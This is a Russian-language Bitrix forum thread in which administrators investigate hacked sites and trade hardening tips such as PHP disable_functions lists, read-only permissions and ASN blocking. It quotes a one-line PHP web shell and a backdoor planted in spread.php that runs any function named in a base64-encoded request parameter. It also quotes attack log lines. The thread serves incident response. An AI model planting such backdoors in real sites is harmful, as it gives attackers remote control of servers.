Разработчикам

Форум

Взломаны сайты в честь дня конституции украины

Заглянувший

Сообщений: 11 Баллов: 1 Регистрация: 11.09.2018

#491

03.03.2023 17:50:16

Цитата
написал: в исходниках с закоментированным кодом? если так, то я был лучшего мнения о команде программистов Битрикса

да там в каждом втором файле какая-то лажа

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#492

03.03.2023 17:53:18

Цитата

написал:
vvv476, у Вас на исследуемом сайте стоят все актуальные обновления движка Битрикса?

запросы с CSISO2022KR возможно просто проверочные, так сказать скан по базе доменов на уязвимость
если они есть в логах это ещё не значит, что они отработали и сайт уязвим ...

для проверки осталось только реализовать уязвимость и попробовать на своём сайте

сугубо по фактам - мне не попадалось ни одного зараженного сайта с установленными актуальными обновлениями, так что делайте выводы

Это не проверочные запросы, поверьте. Код который он несет

Код
<?php system($_POST["a"]); ?>

позволяет делать что угодно. Факт его удачного исполнения подтвержден кодом 200 сервера. К сожалению я не перехватил что именно было в параметре POST "a" того запроса, но характер последующих действий показал что после него началась эксплуатация сервера через bx_root.php про которую я писал выше. Тем, у кого дрянь вылезает после двух часов от бэкапа. Читайте логи веб-сервера. Фильтруйте, анализируйте. Если не найдете сами, пришлите мне.

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#493

03.03.2023 23:15:47

Антон Костин,

Цитата
написал: disable_functions = evil,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source ... теперь собираю статистику что делают и куда ломятся ))

Более мене с не большими последствиями можно заблокировать вот эти
disable_functions = shell_exec,exec,passthru,system,proc_open,curl_multi_exec,parse_ini_file,show_source

exec:
catalog\export
catalog\import

system:
sale\location\import

proc_open:
scale

show_source:
fileman

очень много используется:
eval
curl_exec

Есть мысли как избавиться от использования eval в коде Bitrix что бы eval тоже можно заблокировать?

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#494

03.03.2023 23:22:37

vvv476,

Цитата
Или глобально stream_wrapper_unregister ('php')

Сломается не только php://filter а еще куча https://www.php.net/manual/ru/wrappers.php.php

Самое очевидные
php://input
php://output
php://temp

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#495

03.03.2023 23:29:06

Солюшнс АВИ,

Цитата
написал: А как глобально можно враппер отключить? Это же так или иначе надо в сам файл php прописать, не в каждый же?

В конфиг-файле php можно использовать auto_append_file

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#496

03.03.2023 23:37:48

А вообще права на папки и файлы не должны позволять изменять и создавать папки и файлы пользователю под которым веб-сервер запущен т.е. этому пользователю нужны права только чтение. В корне сайта есть папка /upload/ только в этой папке можно этому пользователю файлы создавать, но не запускать.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#497

04.03.2023 03:59:22

Цитата

xRayDev написал:
А вообще права на папки и файлы не должны позволять изменять и создавать папки и файлы пользователю под которым веб-сервер запущен т.е. этому пользователю нужны права только чтение. В корне сайта есть папка /upload/ только в этой папке можно этому пользователю файлы создавать, но не запускать.

/bitrix/ можно только на чтение поставить, кроме этих директорий
/bitrix/backup/
/bitrix/cache/
/bitrix/managed_cache/
/bitrix/stack_cache/
/bitrix/tmp/ - этот не знаю
ну и естественно при обновлениях движка права нужно будет вернуть

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#498

04.03.2023 04:07:00

Цитата
vvv476 Код который он несет позволяет делать что угодно.

Согласен.

Цитата
vvv476 написал: Факт его удачного исполнения подтвержден кодом 200 сервера.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#499

04.03.2023 04:08:04

Цитата

Алексей Вдовин написал:

Цитата
vvv476 Код который он несет позволяет делать что угодно.

Согласен.

Цитата
vvv476 написал: Факт его удачного исполнения подтвержден кодом 200 сервера.

Не согласен. Код 200 говорит о том, что страница такая есть и POST туда улетел и не вернул ошибку, но это не значит, что он обработался.
Я вам на главную могу кинуть POST любого содержания и вернётся 200 но ничего не произойдёт.

Чтобы удостовериться "поймайте" тело этого запроса ($_POST и $_GET) выше я писал как это можно сделать и в личку мне скиньте, возможно придётся ещё подработать ловилку чтобы передаваемый файл сохранить.

На моих сайтах и сайтах клиентов никакая зараза не пробивается, так что сильно сомневаюсь в пробивных свойствах этого эксплойта.

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7086178

Заглянувший

Сообщений: 6 Баллов: 2 Регистрация: 01.03.2023

#500

04.03.2023 14:23:19

Цитата

написал:
На наши серверы стали постить не на главную страницу, а на /bitrix/tools/spread.php.
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:49.0) Gex
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 " "Mozilla/5.0 (Windows NT x
x185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "POST /bitrix/tools/spread.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NTx
m185.106.94.82 - - [03/Mar/2023:09:01:42 +0300] "GET /bitrix/admin/1dbc26cfe5c3.php HTTP/1.1" 403 124 "Mozilla/5.0 (Windows NT

Предварительно заблочили весь ASN https://asn.ipinfo.app/AS210644 провайдера aeza, заметили что оттуда оосновная масса вредоносных запросов поступает. Блокировали через правила в nginx (через include запрещающих правил типа https://asn.ipinfo.app/api/text/nginx/AS210644 ). Репорт на абуз серверов отправлен дня 4 назад, пров молчит как партизан.

Знаю, что костыль и что это не решение проблемы, но пока так..

Загляните в spread.php. Найдете такой код:

Код
if(isset($_REQUEST["state"]) && is_string($_REQUEST["state"])) { $arState = array(); parse_str(base64_decode($_REQUEST["state"]), $arState); echo $arState[0]($arState[1],$arState[2]); die(); }

Методика та же что и в bx_root - Вызов любой функции с 2-мя аргументами пришедшими из интернета. Удалите или закомментриуйте его. Это тоже следствие. Причины пока ищу.

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером